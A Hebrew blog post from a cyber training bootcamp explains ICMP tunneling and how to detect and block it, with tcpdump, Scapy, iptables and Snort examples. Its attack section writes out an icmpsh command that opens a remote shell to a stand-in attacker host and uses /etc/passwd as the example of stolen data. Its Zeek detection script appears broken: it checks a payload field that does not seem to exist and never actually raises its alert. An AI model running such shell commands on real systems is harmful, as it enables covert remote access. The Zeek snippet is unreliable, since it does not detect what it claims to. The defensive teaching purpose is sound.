מחנה אימון סייבר 8200
למה אנחנוסילבוסלמי זה מיועדתכנית מפורטתמחיריםשאלות נפוצותבלוגהרשם עכשיו
מחנה אימון סייבר 8200
למה אנחנוסילבוסלמי זה מיועדתכנית מפורטתמחיריםשאלות נפוצותבלוג
הרשם עכשיו

Select Language

© 2026 מחנה אימון סייבר 8200

מחנה סייבר 8200

הכשרת סייבר ברמה עילית בהשראת יחידה 8200 של ישראל, עם דגש על פיתוח מיומנויות מעשיות.

קישורים מהירים

  • דף הבית
  • סילבוס
  • תכנית מפורטת
  • מחירים
  • שאלות נפוצות

צור קשר

עקבו אחרינו ברשתות החברתיות

© 2026 מחנה אימון סייבר 8200. כל הזכויות שמורות.

מהי תחנת ICMP וכיצד להגן מפניה

מהי תחנת ICMP וכיצד להגן מפניה

8/24/2026
תחנת ICMP היא טכניקה סמויה שבאמצעותה תוקפים מעבירים פקודות זדוניות או מייצאים נתונים דרך הגנות רשת על ידי הסתרתם בתוך תעבורת ICMP, כגון פינגים. למדו כיצד זה עובד, מדוע זה יעיל, ואילו דרכים קיימות לאתר ולהגן על הרשת שלכם מפני איומים נסתרים אלה.

מהו ICMP Tunneling וכיצד להגן מפניו

מבוא ל-ICMP Tunneling

ICMP tunneling, שיטה שמכונה לעיתים "תקיפות מבוססות מנגנון ping מוסוות", היא טכניקת תקיפה רשתית חמקמקה שבה תוקפים זדוניים מסתירים תעבורת פקודות ושליטה (C2) או פעולות גניבת נתונים בתוך מנות ICMP (Internet Control Message Protocol) תמימות למראה. מכיוון ש-ICMP—המוכר בעיקר לבקשות ping—נעלם לעיתים קרובות מתחת לרדאר של חומות אש ומערכות זיהוי חדירה, זה מציב אתגר רציני לצוותי אבטחת המידע.

במדריך זה נסביר מהו ICMP tunneling, כיצד תוקפים מיישמים אותו, למה זו שיטה מפתה עבור התחמקות, והכי חשוב, איך אנשי אבטחה ומנהלי רשת יכולים לזהות ולהגן מפני התקפות ICMP tunneling. נתחיל מהסברים למתחילים ונעבור לגילוי מתקדם, כולל דוגמאות אמת וקוד לדוגמא לסריקה, מעקב וניתוח תעבורת רשת לפעילות ICMP tunneling.


תוכן עניינים

  • מהו ICMP? עקרונות בסיסיים
  • מהו ICMP Tunneling?
  • איך עובד ICMP Tunneling?
  • למה תוקפים משתמשים ב-ICMP Tunnels
  • דוגמאות אמת לההתקפות ICMP Tunnel
  • זיהוי ICMP Tunneling בפועל
  • סריקה לפעילות ICMP Tunnel
  • הגנה מפני ICMP Tunneling
  • מיגון מתקדם: מודלים לזיהוי חסר מצב
  • סיכום
  • מקורות

מהו ICMP? עקרונות בסיסיים

ICMP (Internet Control Message Protocol) הוא חלק יסודי בסוויטת פרוטוקולי האינטרנט. הוא מתוכנן להודעות על שגיאות, אבחון רשתות, והודעות סטטוס.

עובדות מפתח:

  • ICMP הוא שכבה 3: ממוקם בשכבת הרשת מעל IP.
  • הודעות נפוצות: כוללות Echo Request ו-Echo Reply (ping), יעד לא נגיש, זמן פג, ואחרים.
  • שימושים טיפוסיים: אבחון רשת (כגון ping, traceroute), דיווח שגיאות בין מכשירי רשת.

דוגמה: תעבורת ICMP בסיסית

כאשר אתה מבצע את הפקודה:

ping google.com

המחשב שלך מייצר סדרת מנות Echo Request של ICMP, וגוגל (אם היא מאפשרת ping) מגיבה במנות Echo Reply של ICMP.


מהו ICMP Tunneling?

ICMP tunneling היא טכניקה שמכילה מידע מטען שרירותי בתוך מנות ICMP. מידע זה יכול לכלול קבצים שנגנבו, פקודות מעטפת, או אפילו חיבור TCP שלם, כל זאת מוסתר בתוך בקשות ping או תגובות שנראות תקינות.

מכיוון שארגונים רבים מאפשרים תעבורת ICMP דרך חומות המגן שלהם (למען אבחון לגיטימי), תוקפים מנצלים אמון זה כדי להעביר מידע מוסתר או ליצור דלתות אחוריות לרשת.

הגדרה:

ICMP tunneling הוא שיטת תקשורת מוסתרת שבה תוקפים מקודדים נתונים זדוניים או בלתי מורשים בתוך מנות ICMP כדי לעבור את בקרות הגישה של הרשת.


איך עובד ICMP Tunneling?

ICMP tunneling מנצל את מבנה מנות ICMP—בעיקר Echo Request/Reply—כדי לשאת מידע נוסף, מוסתר.

מבנה מנות ICMP

  • סוג, קוד: מפרטים את ההודעה ב-ICMP (לדוגמה, 8 = Echo Request, 0 = Echo Reply)
  • Checksum: לבדיקת שגיאות
  • מזהה ומספר סדרה: למעקב
  • מידע: שדה אופציונלי, משמש את התוקפים לשאת מידע מוסווה

תהליך Tunneling שלב-לשלב

  1. התוקף תופס שליטה במארח: מקבל גישה למכשיר בתוך רשת היעד.
  2. משיק לקוח ICMP Tunnel: הלקוח מקודד פקודות או מידע בתוך מנות Echo של ICMP—לעיתים באמצעות כלים כגון icmpsh, ptunnel, או סקריפטים מותאמים אישית.
  3. מנות ICMP נשלחות לשרת C2: השרת של התוקפים מחוץ לחומת המגן מקבל את המנות ומפענח את מידע המטען.
  4. מענה מקודד: השרת הרחוק שולח הוראות או תגובות בחזרה, מוסתרות בתוך מנות Echo Reply של ICMP.
  5. מעקף חומת האש: מכיוון שהתעבורה נראית כפעילות ping רגילה, היא לעיתים קרובות לא נבדקת ומאושרת על ידי ברירות המחדל של חוקי רשת.

דוגמה: מנות ICMP Tunnel

מנות Echo Request רגילות של ICMP עשויות להיראות כך:

שדה ערך לדוגמה
סוג 8 (Echo Request)
קוד 0
Checksum 6920
מזהה 13
מספר סדרה 250
מידע "Hello, world!"

התקפת ICMP tunneling עשויה למקם נתונים מקודדים בקידוד base64 בשדה "מידע".


למה תוקפים משתמשים ב-ICMP Tunnels

עקיפת אבטחת היקף

חומות אש חוסמות בדרך כלל חיבורים חיצוניים ישירים (כגון, SSH יוצא, גניבת נתונים דרך HTTP/S).
עם זאת, ICMP מופעל לעיתים קרובות כדי לאפשר אבחון רשת, גם בגבולות ארגוניים.

C2 (פקודות ושליטה)

איום מתמשך ומתקדם (APT) שחקנים משתמשים ב-ICMP tunnels לניהול מארחים שהתפשרו, שליחת פקודות, והוצאת קבצים—וכל זאת מבלי לעורר התראות רשת טיפוסיות.

טכניקות התחמקות

  • פיצול מטען: פיצול הנתונים לפיסות קטנות של ICMP.
  • הצפנה: הטמעת עודפות עם הצפנה או קידוד (Base64, XOR).
  • תיאום תעבורה רגילה: ייצור מנות ICMP במרווחים רגילים, או רק בתגובה לבקשות לגיטימיות.

כלים ל-ICMP Tunneling

רבים מקוד ה-ICMP tunneling תומכים בכלים קוד פתוח להתקפה:

  • icmpsh: מעטפת רחוקה על ICMP.
  • ptunnel: יצירת Tunneling לחיבורי TCP על ICMP.
  • Hans: יצירת Tunneling לחיבורי TCP, כולל ICMP.
  • סקריפטים מותאמים אישית: תוקפים רבים מפתחים כלים מותאמים אישית כדי לעבור על זיהוי מבוסס חתימות.

דוגמאות אמת לההתקפות ICMP Tunnel

דוגמה 1: גניבת נתונים

איום פנימי או תוכנה זדונית על תחנת עבודה מבקש להבריח קבצים רגישים מחוץ לארגון.

שלבים:

  1. מחשב מתפשר מתחבר לשרת ההתקפה C2 באמצעות לקוח ICMP tunnel.
  2. קבצים (כגון, /etc/passwd) מחולקים, מקודדים, ומוסתרים בתוך בקשות Echo מרובות.
  3. השרת הרחוק של התוקף אוסף את המנות ומשחזר את הקובץ הגנוב.

דוגמה 2: מעטפת רחוקה על ICMP

בודקי חדירה ותוקפים משתמשים בכלים כגון icmpsh:

  • המארח הפנימי משיק icmpsh -t <attacker_ip>.
  • השרת של התוקפים (מחוץ לרשת) מאזין לבקשות Echo של ICMP, מפענח ומגיב עם תגובות מעטפת באמצעות Echo Replies.
  • תקשורת מעטפת דו-כיוונית כעת מבוססת ללא צורך בפתיחת פורטים יוצאי סיכון.

מחקר מקרה: ICMP Tunnels בטבע

דיווחים על מתקפות APT ותוכנות זדוניות (במיוחד Backdoor.Win32.ICMPdoor) מנצלים ICMP tunneling לגישה מתמשכת בסביבות אבטחה גבוהה שחוסמות את כל התעבורה היוצאת מלבד HTTP/HTTPS—ו-ICMP.


זיהוי ICMP Tunneling בפועל

זיהוי ICMP tunneling מתבסס על זיהוי דפוסים חריגים או בדיקת תוכן מטען מנות ICMP.

מה לחפש

  • גודל מנות ICMP לא רגיל: מטען ping רגיל הוא 32–56 בתים; גניבת נתונים דורשת הרבה יותר.
  • נפח/תדירות גבוהה: בקשות Echo של ICMP מרובות או תכופות לכתובות חיצוניות נדירות.
  • מידע גדול או בלתי נראה במטענים: מחרוזות מקודדות/מוצפנת במקום טקסט בדיקה פשוט.
  • כתובות קצה לא צפויות: מארחים פנימיים "פינגים" כתובות IP ציבוריות חשודות.

כלים לניתוח תעבורת ICMP

tcpdump

כלי לכידה חבילות המשמש לעיתים קרובות לבדיקת תעבורת ICMP.

# לכידת כל תעבורת ICMP, פלט מפורט
sudo tcpdump -n -v icmp

פלט חשוד לדוגמה (מקוצר):

IP 10.10.10.5 > 203.0.113.10: ICMP echo request, id 4567, seq 3344, length 1024

הערה: 1024 בתים הוא הרבה יותר מהמטען הרגיל של ping ב-ICMP!

Wireshark

מנתח חבילות גרפי.

  1. מסנן תעבורה: icmp
  2. חפש מנות Echo עם מטענים גדולים/מוזרים; לחצן ימני ו"עקוב אחר זרם ICMP" כדי לראות את התוכן.
Zeek (לשעבר Bro)

כלי חזק לניטור אבטחת רשת עם סקריפט מובנה ל-ICMP.

סקריפט לרשום מטעני ICMP חריגים:

event icmp_message(c: connection, icmp: icmp_hdr)
    {
    if ( c$id$orig_h !in Site::internal_networks )
        {
        # Log or alert on large payloads
        if ( c$payload && |c$payload| > 500 )
            local alert = fmt("Large ICMP payload from %s to %s", c$id$orig_h, c$id$resp_h);
        }
    }
שורת פקודה Linux (Bash/Python)

דוגמה ב-Bash: רשום את כל מטעני הפינג היוצאים.

sudo tcpdump -nn -X icmp and host 203.0.113.10 | grep -A 10 "ICMP"

דוגמה בפייתון: נתח pcap למטעני ICMP חריגים

from scapy.all import *

def scan_icmp_pcap(pcap_file):
    packets = rdpcap(pcap_file)
    for pkt in packets:
        if pkt.haslayer(ICMP):
            if len(pkt[ICMP].payload) > 100:
                print(f"Suspicious ICMP from {pkt[IP].src} to {pkt[IP].dst}: {bytes(pkt[ICMP].payload)[:30]}...")

scan_icmp_pcap('capture.pcap')

סריקה לפעילות ICMP Tunnel

כדי לצוד באופן יזום ניצול ICMP tunneling, סריקות רגילות וזיהוי חריגים הם חיוניים.

שלב 1: קביעת בסיס שימוש ב-ICMP

  • עקוב אחר תעבורת ICMP רגילה: נפח, יעדים, גודל מנות.
  • זיהוי נקודות קצה פנימיות וחיצוניות טיפוסיות.

שלב 2: ניתוח חריגות

השתמש בכלים כמו ELK stack, Zeek, Wireshark כדי:

  • העברת מסכים על מנות ICMP גדולות או תכופות באופן לא רגיל.
  • התאם מקורות/יעדים של ICMP עם מודיעין איומים ידוע.

שלב 3: סריקה על Linux/יוניקס

מצא את מנות ICMP הגדולות בזמן אמת:

sudo tcpdump -ni eth0 icmp and greater 200

רשימת גדלי מנות מהקובץ:

sudo tcpdump -nn -r capture.pcap icmp | awk '{print $NF}' | sort | uniq -c | sort -nr

שלב 4: סקריפטים אוטומטיים

Python Scapy: דיווח על Echo Requests עם מטעני גדולים

from scapy.all import *

def detect_large_icmp(pcap_file):
    for pkt in rdpcap(pcap_file):
        if pkt.haslayer(ICMP) and pkt[ICMP].type == 8:
            if len(pkt[ICMP].payload) > 200:
                print(f"Large ICMP Echo Request: {pkt[IP].src} -> {pkt[IP].dst}, size={len(pkt[ICMP].payload)}")
detect_large_icmp("icmp_traf.pcap")

הגנה מפני ICMP Tunneling

1. הגבלת תעבורת ICMP

  • מדיניות חומת אש: חסום ICMP חיצוני, או לפחות הגביל לתחנות ניהול מוכרות. התיר בקשת Echo/תשובה רק אם נדרש.
  • סינון יציאה: מנע ממארחים פנימיים לשלוח ICMP אל כתובות חיצוניות מחוץ למקרים מאושרים.

דוגמה: חסום יציאת ICMP עם iptables

sudo iptables -A OUTPUT -p icmp --icmp-type echo-request -j DROP

2. בדיקת מטעני ICMP

  • פרוס פתרונות IDS/IPS (כגון Snort, Suricata) עם חתימות ICMP tunneling או חוקים על מטענים חריגים.
  • עקוב אחר גודל המטען, תדירות, ויעד.

דוגמת חוק Snort:

alert icmp any any -> any any (msg:"Suspicious ICMP Payload Size"; dsize:>200; sid:1000001; rev:1;)

3. רישום והתראה

  • ודא רישום של כל תעבורת ICMP, במיוחד מטענים גדולים או מוזרים.
  • קבע התראות SIEM על חריגות.

4. חינוך משתמשים וזכויות גישה מינימליות

  • מנע ממשתמשים רגילים/עובדים במצב פריצה ליצור ICMP לכתובות חיצוניות.
  • בטל יציאת ICMP מכל המכשירים שאינם נדרשים.

5. זיהוי איומים מתקדם

  • השתמש בלמידה מכונתית/היוריסטיקות (ראה Zeek/Suricata אינטגרציות) כדי לסמן דפוסי תעבורה שמתאימים לכלי ICMP tunneling ידועים.
  • סקירה תקופתית של יומני נקודות קצה/רשת.

6. טלאי ותחזוקה

  • עדכן מכשירי רשת ותכנה כדי לתקן פגיעויות בטיפול ICMP.
  • שמת מידע על כלי תקיפה וחתימות עכשוויים.

מיגון מתקדם: מודלים לזיהוי חסר מצב

מחקרים הראו שמעקב ללא מצב—מעקב אחר זרימות וגדלים של מנות ICMP, לא רק מצבם או סדרתם—יכול להיות דרך עם השפעה נמוכה וניתנת להגדלת לשם זיהוי tunneling.

עקרונות זיהוי ללא מצב

  • בהתאם לכל מנות באופן עצמאי: זיהוי דפוסים חשודים על בסיס גודל ותדירות מנות ICMP בודדות.
  • ללא מעקב אחר מושב שמור: פחות משפיע על חומות אש/נתבים.
  • העברת התראות על סף: לדוגמה, לסמן את כל מנות Echo של ICMP >500 בתים.

השפעת ביצועים

לפי Singh & Nordström, מודלים ללא מצב יכולים לזהות ערוצים מוסווים ביעילות מבלי להשפיע באופן משמעותי על מארחים או נתבים—אפילו בקנה מידה.


סיכום

ICMP tunneling מייצג איום שאינו ברור ונמוך המסתתר בצורה רגילה אחרות של פעולות רשת לגיטימיות, מה שהופך את הזיהוי וההגנה לקשים עבור צוותי כחולים. עם השימוש הנפוץ ב-ICMP לאבחנות והתדירות שבה ארגונים מאפשרים תעבורה כזו דרך חומות המגן שלהם, זהו אמצעי מועדף עבור תוקפים המתקינים פקודות ושלטה מוסוות, מוציאים נתונים רגישיים, או גישה שקומפרומיירה.

נקודות מפתח

  • ICMP tunneling מנצל פרוטוקולים מהימנים לתקשורת מוסוות.
  • תוקפים מתוחכמים משתמשים בו לניהול C2 והוצאת נתונים.
  • זיהוי מצריך מעקב אחר גודל מנות ICMP לא רגיל, תדירות ויעדים.
  • הגנה כוללת עירוב של תצפית על יציאת רשת, הגבלת ICMP, ניתוח מטענים, ורישום/התראה אוטומטיים.
  • מודלים ללא מצב מאפשרים הגנה ניתנת להגדלה בלי לגרום לפגיעה בביצועי הרשת.

על ידי הבססת פעילות ICMP הלגיטימית של הרשת והפעלת זיהוי מבוסס על חתימה וגם פרעות, הארגון שלך יכול לנטרל וקטור איום מוסווה זה לפני שהוא מוביל לאובדן נתונים או פשרה נוספת.


מקורות

  • Detect and Stop ICMP Tunneling – ExtraHop Blog
  • What is ICMP Tunneling? – DeepStrike
  • Malicious ICMP Tunneling: Defense against the Vulnerability – Semantic Scholar
  • ICMP Tunnels and Covert Channels – PacketLife.net
  • icmpsh project – Github
  • Ping Tunnel (ptunnel)
  • Snort – Network Intrusion Detection System
  • Wireshark – Network Protocol Analyzer
  • Zeek – Network Security Monitor

הגן על היקפך—ואל תתעלם מהפינג הפשוט!

🚀 מוכנים לעלות רמה?

קח את קריירת הסייבר שלך לשלב הבא

אם מצאתם את התוכן הזה בעל ערך, תארו לעצמכם מה תוכלו להשיג עם תוכנית ההכשרה המקיפה והאליטיסטית שלנו בת 47 שבועות. הצטרפו ליותר מ-1,200 סטודנטים ששינו את הקריירה שלהם בעזרת טכניקות יחידה 8200.

הירשם לתוכנית המלאהצפה בסילבוס
97% שיעור השמה לעבודה
טכניקות יחידה 8200 עילית
42 מעבדות מעשיות